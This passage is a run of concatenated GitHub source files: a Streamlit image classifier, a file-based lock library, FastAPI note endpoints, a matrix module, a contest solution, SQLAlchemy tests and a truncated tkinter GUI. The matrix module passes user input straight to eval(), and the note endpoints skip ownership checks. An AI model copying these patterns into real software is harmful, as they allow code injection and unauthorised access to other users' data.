numpy_image = img_to_array(frame)\r\n    image_batch = np.expand_dims(numpy_image, axis=0)\r\n    processed_image = vgg16.preprocess_input(image_batch.copy())\r\n\r\n    # get the predicted probabilities for each class\r\n    predictions = model.predict(processed_image)\r\n    # print predictions\r\n    # convert the probabilities to class labels\r\n    # we will get top 5 predictions which is the default\r\n    label_vgg = decode_predictions(predictions)\r\n    # print VGG16 predictions\r\n    #for prediction_id in range(len(label_vgg[0])):\r\n    #    print(label_vgg[0][prediction_id])\r\n    \r\n    # format final image visualization to display the results of experiments\r\n    cv2.putText(cam_frame, \"VGG16: {}, {:.2f}\".format(label_vgg[0][0][1], label_vgg[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n    return cam_frame\r\n\r\ndef resnet50_predict(cam_frame, image_size):\r\n    frame= cv2.resize(cam_frame, (image_size, image_size))\r\n    numpy_image = img_to_array(frame)\r\n    image_batch = np.expand_dims(numpy_image, axis=0)\r\n    \r\n    # prepare the image for the ResNet50 model\r\n    processed_image = resnet50.preprocess_input(image_batch.copy())\r\n    # get the predicted probabilities for each class\r\n    predictions = model.predict(processed_image)\r\n    # convert the probabilities to class labels\r\n    # If you want to see the top 3 predictions, specify it using the top argument\r\n    label_resnet = decode_predictions(predictions, top=3)\r\n    # print ResNet predictions\r\n    #for prediction_id in range(len(label_resnet[0])):\r\n    #    print(label_resnet[0][prediction_id])\r\n    \r\n    # format final image visualization to display the results of experiments\r\n    #cv2.putText(cam_frame, \"VGG16: {}, {:.2f}\".format(label_vgg[0][0][1], label_vgg[0][0][2]) , (50, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n    #cv2.putText(cam_frame, \"MobileNet: {}, {:.2f}\".format(label_mobilenet[0][0][1], label_mobilenet[0][0][2]) , (50, 75), 
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n #cv2.putText(cam_frame, \"Inception: {}, {:.2f}\".format(label_inception[0][0][1], label_inception[0][0][2]) , (50, 110), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)\r\n cv2.putText(cam_frame, \"ResNet50: {}, {:.2f}\".format(label_resnet[0][0][1], label_resnet[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n\r\ndef mobilenet_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n \r\n # prepare the image for the MobileNet model\r\n processed_image = mobilenet.preprocess_input(image_batch.copy())\r\n\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n\r\n # convert the probabilities to imagenet class labels\r\n label_mobilenet = decode_predictions(predictions)\r\n # print MobileNet predictions\r\n #for prediction_id in range(len(label_mobilenet[0])):\r\n # print(label_mobilenet[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n cv2.putText(cam_frame, \"MobileNet: {}, {:.2f}\".format(label_mobilenet[0][0][1], label_mobilenet[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n \r\ndef inception_v3_predict(cam_frame, image_size):\r\n frame= cv2.resize(cam_frame, (image_size, image_size))\r\n numpy_image = img_to_array(frame)\r\n image_batch = np.expand_dims(numpy_image, axis=0)\r\n processed_image = inception_v3.preprocess_input(image_batch.copy())\r\n\r\n # get the predicted probabilities for each class\r\n predictions = model.predict(processed_image)\r\n # print predictions\r\n # convert the probabilities to class labels\r\n # we will get top 5 predictions which is the default\r\n label_inception = decode_predictions(predictions)\r\n # print Inception predictions\r\n #for prediction_id in range(len(label_inception[0])):\r\n # print(label_inception[0][prediction_id])\r\n \r\n # format final image visualization to display the results of experiments\r\n cv2.putText(cam_frame, \"Inception: {}, {:.2f}\".format(label_inception[0][0][1], label_inception[0][0][2]) , (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 1)\r\n return cam_frame \r\n\r\nmode = 1\r\nmodel = vgg16.VGG16(weights='imagenet')\r\nimage_size = 224\r\n\r\ndef select_models():\r\n st.sidebar.markdown(\"# Image Classification\")\r\n option = st.sidebar.selectbox(\r\n 'Select a Deep Learning Model:',\r\n [\"VGG16\",\"RESNET50\",\"MOBILENET\",\"INCEPTION_V3\"], index=0)\r\n st.sidebar.write('You selected:', option)\r\n if option == \"VGG16\":\r\n model = vgg16.VGG16(weights='imagenet')\r\n image_size = 224\r\n mode = 1\r\n elif option == \"RESNET50\":\r\n model = resnet50.ResNet50(weights='imagenet')\r\n image_size = 224\r\n mode = 2\r\n elif option == \"MOBILENET\":\r\n model = mobilenet.MobileNet(weights='imagenet')\r\n image_size = 224\r\n mode = 3\r\n \r\n elif option == \"INCEPTION_V3\":\r\n model = inception_v3.InceptionV3(weights='imagenet')\r\n image_size = 299\r\n mode = 4\r\n return mode\r\n\r\ndef classify_image(frame,mode):\r\n if mode == 1:\r\n frame = vgg16_predict(frame, image_size)\r\n elif mode == 2:\r\n frame = resnet50_predict(frame, image_size)\r\n elif mode == 3:\r\n frame = mobilenet_predict(frame, image_size)\r\n elif mode == 4:\r\n frame = inception_v3_predict(frame, image_size)\r\n return frame\r\n\r\ndef main():\r\n \"\"\"Image 
Classification App\"\"\"\r\n\r\n st.title(\"Image Classification App\")\r\n st.text(\"Build with Streamlit and OpenCV\")\r\n activities = [\"Image Classification\",\"About\"]\r\n choice = st.sidebar.selectbox(\"Select Activty\",activities)\r\n if choice == 'Image Classification':\r\n mode = select_models()\r\n image_file = st.file_uploader(\"Upload Image\",type=['jpg','png','jpeg'])\r\n\r\n if image_file is not None:\r\n our_image = Image.open(image_file)\r\n st.text(\"Original Image\")\r\n # st.write(type(our_image))\r\n st.image(our_image)\r\n #convert to CV2 format\r\n new_img = np.array(our_image.convert('RGB'))\r\n image = cv2.cvtColor(new_img,1)\r\n # Get the boxes for the objects detected by YOLO by running the YOLO model.\r\n image = classify_image(image,mode)\r\n st.text(\"Classification Image\")\r\n st.image(image.astype(np.uint8), use_column_width=True)\r\n\r\n elif choice == 'About':\r\n st.subheader(\"About Image Classification App\")\r\n st.markdown(\"Built with Streamlit by [LSBU](https://www.lsbu.ac.uk/)\")\r\n st.text(\"Professor Perry Xiao\")\r\n st.success(\"Copyright @ 2020 London South Bank University\")\r\nif __name__ == '__main__':\r\n main()\t\r\n","repo_name":"PerryXiao2015/streamlit-file-image-classification","sub_path":"StreamlitFileImageClassification.py","file_name":"StreamlitFileImageClassification.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"31738316687","text":"import os\nimport tempfile\nimport time\n\n\n__all__ = (\"NamedAtomicLock\",)\n\n__version__ = \"1.1.3\"\n\n__version_tuple__ = (1, 1, 3)\n\nDEFAULT_POLL_TIME = 0.1\n\ntry:\n FileNotFoundError\nexcept:\n FileNotFoundError = OSError\n\n\nclass NamedAtomicLock(object):\n def __init__(self, name, lockDir=None, maxLockAge=None):\n \"\"\"\n NamedAtomicLock - Create a NamedAtomicLock.\n This uses a named directory, which is defined by POSIX as an atomic operation.\n @param name - The lock name, Cannot contain directory seperator (like '/')\n @param lockDir - Directory in which to store locks. Defaults to tempdir\n @param maxLockAge - Maximum number of seconds lock can be held before it is considered \"too old\" and fair game to be taken.\n You should likely define this as a reasonable number, maybe 4x as long as you think the operation will take, so that the lock doesn't get\n held by a dead process.\n \"\"\"\n self.name = name\n self.maxLockAge = maxLockAge\n\n if os.sep in name:\n raise ValueError('Name cannot contain \"%s\"' % (os.sep,))\n\n if lockDir:\n if lockDir[-1] == os.sep:\n lockDir = lockDir[:-1]\n if not lockDir:\n raise ValueError(\"lockDir cannot be \" + os.sep)\n else:\n lockDir = tempfile.gettempdir()\n\n self.lockDir = lockDir\n\n if not os.path.isdir(lockDir):\n raise ValueError(\n \"lockDir %s either does not exist or is not a directory.\" % (lockDir,)\n )\n\n if not os.access(lockDir, os.W_OK):\n raise ValueError(\"Cannot write to lock directory: %s\" % (lockDir,))\n self.lockPath = lockDir + os.sep + name\n\n self.held = False\n self.acquiredAt = None\n\n def acquire(self, timeout=None):\n \"\"\"\n acquire - Acquire given lock. 
Can be blocking or nonblocking by providing a timeout.\n Returns \"True\" if you got the lock, otherwise \"False\"\n @param timeout - Max number of seconds to wait, or None to block until we can acquire it.\n @return - True if you got the lock, otherwise False.\n \"\"\"\n if self.held is True:\n # NOTE: Without some type of in-directory marker (like a uuid) we cannot\n # refresh an expired lock accurately\n if os.path.exists(self.lockPath):\n return True\n # Someone removed our lock\n self.held = False\n\n # If we aren't going to poll at least 5 times, give us a smaller interval\n if timeout:\n if timeout / 5.0 < DEFAULT_POLL_TIME:\n pollTime = timeout / 10.0\n else:\n pollTime = DEFAULT_POLL_TIME\n\n endTime = time.time() + timeout\n\n def keepGoing():\n return bool(time.time() < endTime)\n\n else:\n pollTime = DEFAULT_POLL_TIME\n\n def keepGoing():\n return True\n\n success = False\n while keepGoing():\n try:\n os.mkdir(self.lockPath)\n success = True\n break\n except:\n time.sleep(pollTime)\n if self.maxLockAge:\n if (\n os.path.exists(self.lockPath)\n and os.stat(self.lockPath).st_mtime\n < time.time() - self.maxLockAge\n ):\n try:\n os.rmdir(self.lockPath)\n except:\n # If we did not remove the lock, someone else is at the same point and contending. Let them win.\n time.sleep(pollTime)\n\n if success is True:\n self.acquiredAt = time.time()\n\n self.held = success\n return success\n\n def release(self, forceRelease=False):\n \"\"\"\n release - Release the lock.\n @param forceRelease default False - If True, will release the lock even if we don't hold it.\n @return - True if lock is released, otherwise False\n \"\"\"\n if not self.held:\n if forceRelease is False:\n return False # We were not holding the lock\n else:\n self.held = (\n True # If we have force release set, pretend like we held its\n )\n\n if not os.path.exists(self.lockPath):\n self.held = False\n self.acquiredAt = None\n return True\n\n if forceRelease is False:\n # We waited too long and lost the lock\n if self.maxLockAge and time.time() > self.acquiredAt + self.maxLockAge:\n self.held = False\n self.acquiredAt = None\n return False\n\n self.acquiredAt = None\n\n try:\n os.rmdir(self.lockPath)\n self.held = False\n return True\n except:\n self.held = False\n return False\n\n def __checkExpiration(self, mtime=None):\n \"\"\"\n __checkExpiration - Check if we have expired\n\n @param mtime - Optional mtime if known, otherwise will be gathered\n @return - True if we did expire, otherwise False\n \"\"\"\n if not self.maxLockAge:\n return False\n\n if mtime is None:\n try:\n mtime = os.stat(self.lockPath).st_mtime\n except FileNotFoundError as e:\n return False\n\n if mtime < time.time() - self.maxLockAge:\n return True\n\n return False\n\n @property\n def isHeld(self):\n \"\"\"\n isHeld - True if anyone holds the lock, otherwise False.\n @return bool - If lock is held by anyone\n \"\"\"\n if not os.path.exists(self.lockPath):\n return False\n\n try:\n mtime = os.stat(self.lockPath).st_mtime\n except FileNotFoundError as e:\n return False\n\n if self.__checkExpiration(mtime):\n return False\n\n return True\n\n @property\n def hasLock(self):\n \"\"\"\n hasLock - Property, returns True if we have the lock, or False if we do not.\n @return - True/False if we have the lock or not.\n \"\"\"\n # If we don't hold it currently, return False\n if self.held is False:\n return False\n\n # Otherwise if we think we hold it, but it is not held, we have lost it.\n if not self.isHeld:\n self.acquiredAt = None\n self.held = False\n return 
False\n\n # Check if we expired\n if self.__checkExpiration(self.acquiredAt):\n self.acquiredAt = None\n self.held = False\n return False\n\n return True\n\n\n# vim: set ts=4 sw=4 expandtab :\n","repo_name":"yulinfeng000/DaKaLa","sub_path":"app/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"71"} +{"seq_id":"10072115191","text":"from typing import Any, List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, BackgroundTasks, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database.session import get_db\n\nfrom .. import models, schemas, services\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[schemas.Note], status_code=status.HTTP_200_OK)\ndef read_notes_by_user(\n *,\n db: Session = Depends(get_db),\n current_user: models.User = Depends(services.get_current_user),\n page_size: int = 30,\n page: int = 1,\n) -> Any:\n notes = services.note.find_by_user(\n db,\n user_id=current_user.id, # type: ignore\n limit=page_size,\n offset=page_size * (page - 1),\n )\n return notes\n\n\n@router.post(\"\", response_model=schemas.Note, status_code=status.HTTP_201_CREATED)\nasync def create_note(\n *,\n db: Session = Depends(get_db),\n note_in: schemas.NoteCreate,\n current_user: models.User = Depends(services.get_current_user),\n background_tasks: BackgroundTasks,\n) -> Any:\n note = services.note.create_with_user(\n db, object_in=note_in, user_id=current_user.id # type: ignore\n )\n background_tasks.add_task(services.note.summarize_note, db, note, note_in.content)\n return note\n\n\n@router.get(\"/{note_id}\", response_model=schemas.Note, status_code=status.HTTP_200_OK)\ndef read_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n return note\n\n\n@router.patch(\"/{note_id}\", response_model=schemas.Note, status_code=status.HTTP_200_OK)\ndef update_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n note_in: schemas.NoteUpdate,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n note = services.note.update(db, object_model=note, object_in=note_in)\n return note\n\n\n@router.delete(\"/{note_id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n services.note.remove(db, object_model=note)\n","repo_name":"pers0n4/WiseNote","sub_path":"server/app/api/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33101092028","text":"from Matrix_Knowledge import Explanation\r\nfrom Matrix_Tools import *\r\nfrom Matrix_Operations import *\r\n\r\nMaster_Matrix_Data = {}\r\n\r\n\r\nsample_matrix = [[1,2,3],[1,2,3],[1,2,3]]\r\n\r\nclass Matrix:\r\n\telement = {}\r\n\r\n\tdef 
__init__(self,nested_list):\r\n\t\tself.rows = len(nested_list)\r\n\t\tself.columns = len(nested_list[0])\r\n\t\tself.__rawmatrix = nested_list\r\n\t\tself.type = self.MatrixType()\r\n\t\tself.trace = self.Trace()\r\n\r\n\t\tfor i in range(self.rows):\r\n\t\t\tfor j in range(self.columns):\r\n\t\t\t\tself.element[f\"{i+1}{j+1}\"] = nested_list[i][j]\r\n\r\n\tdef IsSquare(self,Matrix = None,Explain = True):\r\n\t\tMatrix = self.__rawmatrix\r\n\t\tif type(Explain) == bool:\r\n\t\t\tif Explain:\r\n\t\t\t\tNR = len(Matrix)\r\n\t\t\t\tNC = len(Matrix[0])\r\n\t\t\t\tif NR == NC:\r\n\t\t\t\t\tEXPLAIN(\"Square_True\",(NR,NC))\r\n\t\t\t\telse:\r\n\t\t\t\t\tEXPLAIN(\"Square_False\",(NR,NC))\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\telse:\r\n\t\t\tif len(Matrix) == len(Matrix[0]):\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\tdef IsDiagonal(self,Matrix = None,ReqForVal = False,Explain = True): \r\n\t Reality = False\r\n\t Matrix = self.__rawmatrix\r\n\t \r\n\t DgVal = []\r\n\t \r\n\t if self.IsSquare(Matrix,Explain = None):\r\n\t i = 0\r\n\t j = 0\r\n\t for z in range(len(Matrix)*len(Matrix[0])):\r\n\t if (i != j and Matrix[i][j] != 0) or (i == j and Matrix[i][j] == 0):\r\n\t Reality = False\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_False\")\r\n\t break\r\n\t else:\r\n\t pass\r\n\t if j < len(Matrix[0]) - 1:\r\n\t j += 1\r\n\t else:\r\n\t j = 0\r\n\t i += 1\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_True\")\r\n\t \r\n\t \r\n\t if ReqForVal:\r\n\t for g in range(len(Matrix)):\r\n\t DgVal.append(Matrix[g][g])\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_Not_Square\")\r\n\t if DgVal: \r\n\t return Reality,DgVal\r\n\t else:\r\n\t return Reality\r\n\r\n\tdef IsScalar(self,Matrix = None,ReqForVal = False,Explain = True):\r\n\t Reality = False\r\n\t Matrix = self.__rawmatrix\r\n\t if self.IsDiagonal(Matrix):\r\n\t a,b = self.IsDiagonal(Matrix,True)\r\n\t x = b[0]\r\n\t for i in range(1,len(b)):\r\n\t if b[i] != x:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_False\")\r\n\t break\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_True\",(x,x,len(b)))\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_Matrix_Not_Diagonal\")\r\n\r\n\t if ReqForVal:\r\n\t return Reality,x\r\n\t else:\r\n\t return Reality\r\n\r\n \r\n\tdef ReturnScalarVal(self,Matrix):\r\n\t try:\r\n\t a,b = self.IsScalar(Matrix,True)\r\n\t if b:\r\n\t return b\r\n\t except:\r\n\t print(\"Unsuitable Matrix given to find scalar value\")\r\n \r\n\tdef IsIdentity(self,Matrix = None,Explain = True):\r\n\t if self.IsScalar(self.__rawmatrix):\r\n\t if ReturnScalarVal(self.__rawmatrix) == 1:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_True\",(len(self.__rawmatrix),))\r\n\t return True\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_False\",(self.__rawmatrix[0][0],))\r\n\t return False\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_Matrix_Not_Scalar\")\r\n\t return False\r\n\r\n\tdef ReturnDiagonal(self,Matrix = None):\r\n\t try:\r\n\t a,b = self.IsDiagonal(self.__rawmatrix,True)\r\n\t if b:\r\n\t return b\r\n\t except:\r\n\t print(\"Ineligible Matrix given to return diagonal\")\r\n \r\n\tdef IsNull(self,Matrix = None,Explain = True):\r\n\t Reality = False\r\n\t i = j = 0\r\n\t for z in range(len(self.__rawmatrix)*len(self.__rawmatrix[0])):\r\n\t if self.__rawmatrix[i][j] != 0:\r\n\t Reality = False\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Null_False\")\r\n\r\n\t 
break\r\n\t \r\n\t if j < len(self.__rawmatrix[0]) - 1:\r\n\t j += 1\r\n\t else:\r\n\t j = 0\r\n\t i += 1\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Null_True\")\r\n\t return Reality\r\n\r\n\r\n\tdef MatrixType(self,Matrix = None):\r\n\r\n\t if len(self.__rawmatrix) == 1:\r\n\t return(\"Row Matrix\")\r\n\t elif len(self.__rawmatrix[0]) == 1:\r\n\t return(\"Coloumn Matrix\")\r\n\t elif self.IsIdentity(self.__rawmatrix):\r\n\t return(\"Identity Matrix\")\r\n\t elif self.IsScalar(self.__rawmatrix):\r\n\t return(\"Scalar Matrix\")\r\n\t elif self.IsDiagonal(self.__rawmatrix):\r\n\t return(\"Diagonal Matrix\")\r\n\t elif self.IsNull(self.__rawmatrix):\r\n\t return(\"Null Matrix\")\r\n\t elif self.IsSquare(self.__rawmatrix):\r\n\t return(\"Square Matrix\")\r\n\t else:\r\n\t return(\"Rectangular Matrix\")\r\n\r\n\tdef Trace(self):\r\n\t if self.IsDiagonal(self.__rawmatrix):\r\n\t x = 0\r\n\t for i in self.ReturnDiagonal(self.__rawmatrix):\r\n\t x += i\r\n\t return x\r\n\t else:\r\n\t \treturn \"Given Matrix is ineligible to have attribute 'trace'\"\r\n\r\n\tdef __str__(self):\r\n\t Matrix = self.__rawmatrix\r\n\t spacing = [1]*len(Matrix[0])\r\n\t top_bottom_spacing = 0\r\n\r\n\r\n\t for i in range(len(Matrix)):\r\n\t for j in range(len(Matrix[0])):\r\n\t a = len(str(Matrix[i][j]))\r\n\t if a > spacing[j]:\r\n\t spacing[j] = a\r\n\t else:\r\n\t \tfor x in spacing:\r\n\t top_bottom_spacing += x\r\n\t \r\n\t Matrix_str = ''\r\n\t \r\n\t for i in range(len(Matrix)):\r\n\t if i == 0:\r\n\t Matrix_str += '┌'+ ' '*(top_bottom_spacing + 2 + len(spacing) - 1) + '┐' + '\\n'\r\n\r\n\t Matrix_str += '│ '\r\n\r\n\r\n\t for j in range(len(spacing)):\r\n\t Matrix_str += ' '*(spacing[j] - len(str(Matrix[i][j]))) + str(Matrix[i][j]) + ' '\r\n\t Matrix_str += '│' + '\\n'\r\n\t else:\r\n\t Matrix_str += '└'+ ' '*(top_bottom_spacing + 2 + len(spacing) - 1) + '┘' + '\\n'\r\n\r\n\t return Matrix_str\t\t\r\n\r\n\tdef __add__(self,other):\r\n\t\tif type(other) == int: #Scalar Addition\r\n\t\t\tScalarAddition(self.__rawmatrix,other,Explain = True)\r\n\t\telif type(self) == type(other): #Matrix Addition\r\n\t\t\tMatrixAddition(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\r\n\r\n\tdef __sub__(self,other):\r\n\t\tif type(other) == int:\r\n\t\t\tScalarAddition(self.__rawmatrix,-other,Explain = True)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixSubtraction(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\r\n\r\n\tdef __mul__(self,other):\r\n\t\tif type(other) == int:\r\n\t\t\tScalarMultiplication(self.__rawmatrix,other,Explain = True)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixMultiplication(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\t\r\n\r\n\tdef __pow__(self,other):\r\n\t\tprint(other)\r\n\t\t\r\n\t\tif type(other) == int:\r\n\t\t\tScalarPower(self.__rawmatrix,other)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixPower(self.__rawmatrix,other.__rawmatrix)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\r\n\t\t\r\n\r\nx = Matrix(sample_matrix)\r\ndef execute_user_input(input_):\r\n\ttry:\r\n\t\t_a = eval(input_)\r\n\t\tprint(Explanation_Result['value'])\r\n\t\treturn Explanation_Result['value']\r\n\texcept:\r\n\t\treturn \"Expression was not able to 
be executed. Please check your syntax\"\r\n\r\n\r\n","repo_name":"gk9516/OMNISCIENT-WIZARD-","sub_path":"Matrices_Master_Module.py","file_name":"Matrices_Master_Module.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71142750310","text":"for _ in range(int(input())):\r\n n = int(input())\r\n arr = list(map(int, input().split()))\r\n ch = [-1]*(n+1)\r\n ans = [0]*(n+1)\r\n for i in range(n):\r\n if ch[arr[i]] == -1:\r\n ans[arr[i]] += 1\r\n elif ch[arr[i]] >= 0:\r\n dist = abs(ch[arr[i]] - i - 1)\r\n if dist%2 == 0:\r\n # print(arr[i], ch[arr[i]], i)\r\n ans[arr[i]] += 1\r\n ch[arr[i]] = i\r\n\r\n print(\" \".join([str(ans[i]) for i in range(1, n+1)]))\r\n","repo_name":"Azim-Islam/Problem-Solving-DSA","sub_path":"CodeForces/round_809_div2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"73163013669","text":"import unittest\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import Session \r\nimport os\r\n\r\nfrom automationv3.requirements.models import Requirement\r\n\r\nclass TestRequirements(unittest.TestCase):\r\n def setUp(self):\r\n self.db_file = \"test_requirements.db\"\r\n engine = create_engine(f\"sqlite:///{self.db_file}\")\r\n self.session = Session(engine) \r\n\r\n Requirement.metadata.create_all(engine)\r\n\r\n reqs = [\r\n Requirement(id=\"R1\", text=\"Test requirement 1\", subsystem=\"Test subsystem 1\"),\r\n Requirement(id=\"R2\", text=\"Test requirement 2\", subsystem=\"Test subsystem 2\"),\r\n ]\r\n self.session.add_all(reqs)\r\n self.session.commit()\r\n\r\n def tearDown(self):\r\n self.session.close()\r\n os.remove(self.db_file)\r\n\r\n def test_add_and_get(self):\r\n self.session.add(Requirement(id=\"R3\", text=\"Test requirement\", subsystem=\"Test subsystem\"))\r\n self.session.commit()\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R3').one()\r\n self.assertEqual(result.id, \"R3\")\r\n self.assertEqual(result.text, \"Test requirement\")\r\n self.assertEqual(result.subsystem, \"Test subsystem\")\r\n\r\n def test_get_all(self):\r\n results = self.session.query(Requirement).all()\r\n self.assertEqual(len(results), 2)\r\n self.assertEqual(results[0].id, \"R1\")\r\n self.assertEqual(results[1].id, \"R2\")\r\n \r\n def test_get_by_subsystem(self):\r\n results = self.session.query(Requirement).filter(Requirement.subsystem == 'Test subsystem 2').all()\r\n self.assertEqual(len(results), 1)\r\n self.assertEqual(results[0].id, \"R2\")\r\n\r\n def test_get_subsystem(self):\r\n results = [r.subsystem \r\n for r in self.session.query(Requirement.subsystem).distinct()]\r\n self.assertEqual(len(results), 2)\r\n self.assertEqual(results[0], \"Test subsystem 1\")\r\n self.assertEqual(results[1], \"Test subsystem 2\")\r\n\r\n def test_delete(self):\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R1').one()\r\n self.session.delete(result)\r\n self.session.commit()\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R1').first()\r\n self.assertIsNone(result)\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"fillet54/automation-v3","sub_path":"test/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} 
+{"seq_id":"33958922448","text":"import tkinter as tk\nfrom tkinter import ttk\n\ni = 0\ndef capture():\n print('Capture Mode')\n lblMenu['text'] = 'capture'\n\ndef liveView():\n print('Live View Mode')\n lblMenu['text'] = 'LIVE'\n\ndef sendButtonPressed():\n print('Button pressed')\n label_command['text'] = '\\nButton pressed!\\n'\n nCapture = entry_capture.get()\n nSamples = entry_sample.get()\n sampleRate = entry_rate.get()\n\n print(nCapture)\n print(nSamples)\n print(sampleRate)\n\n global i\n i += 1\n print(i)\n bar_var.set(i)\n \n\nmainWindow = tk.Tk()\nmainWindow.title(\"PIBITI-2019\")\n\n#dimensoes da janela\nwindowWidth = 480\nwindowHeight = 320\nscreenWidth = mainWindow.winfo_screenwidth()\nscreenHeight = mainWindow.winfo_screenheight()\nposx =screenWidth/2 - windowWidth/2 \nposy =screenHeight/2 - windowHeight/2\n\nmainWindow.geometry(\"%dx%d+%d+%d\" % (windowWidth,windowHeight,posx,posy))\nmainWindow.minsize(width = windowWidth, height = windowHeight)\n\n#aparencia\n\nmainWindow.iconbitmap(\"code/resources/icon/if.ico\")\nmainWindow.state(\"zoomed\") \n#mainWindow['bg'] = \"gray\"\n\n'''\nbtnCapture = tk.Button(mainWindow, text = \"Capture\", command = capture)\nbtnLive = tk.Button(mainWindow, text = \"Live View\", command = liveView)\nlblMenu = tk.Label(\n mainWindow,\n text = \"What do you want to do?\", \n relief = \"groove\",\n font = \"Arial 30 bold\",\n justify = \"left\",\n width = \"50\",\n height = 2,\n anchor = 'w')\n'''\n\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\n##OPERATION frame\n\nframe_operation = tk.Frame(mainWindow)\n\n### widgets\n\nlabel_operation = tk.Label(frame_operation, bg = \"blue\",text=\"Operation\")\n\nlabel_capture = tk.Label(frame_operation,text=\"Number of Captures:\")\nentry_capture = tk.Entry(frame_operation)\nlabel_sample = tk.Label(frame_operation,text=\"Number of Samples:\")\nentry_sample = tk.Entry(frame_operation)\nlabel_rate = tk.Label(frame_operation,text=\"Sample Rate(ms):\")\nentry_rate = tk.Entry(frame_operation)\n\n### layout\n\nlabel_operation.grid(sticky=\"we\",rowspan=2)\n\nlabel_capture.grid(sticky='we')\nentry_capture.grid(sticky='we')\nlabel_sample.grid(sticky='we')\nentry_sample.grid(sticky='we')\nlabel_rate.grid(sticky='we')\nentry_rate.grid(sticky='we')\n\n\n##Graphics Frame\n\n### widgets\n\n### layout\n\n\n##ADDITIONAL Frame\n\nframe_additional = tk.Frame(mainWindow)\n\n### widgets\n\nlabel_additional = tk.Label(frame_additional,text = \"ADDITIONAL\",bg = 'blue')\n\nbutton_command = tk.Button(frame_additional,text=\"SEND\\nCOMMAND\",command = sendButtonPressed)#lambda: sendButtonPressed(i))\nlabel_command = tk.Label(frame_additional,text = '\\n\\n\\n')\nlabel_progress = tk.Label(frame_additional,text 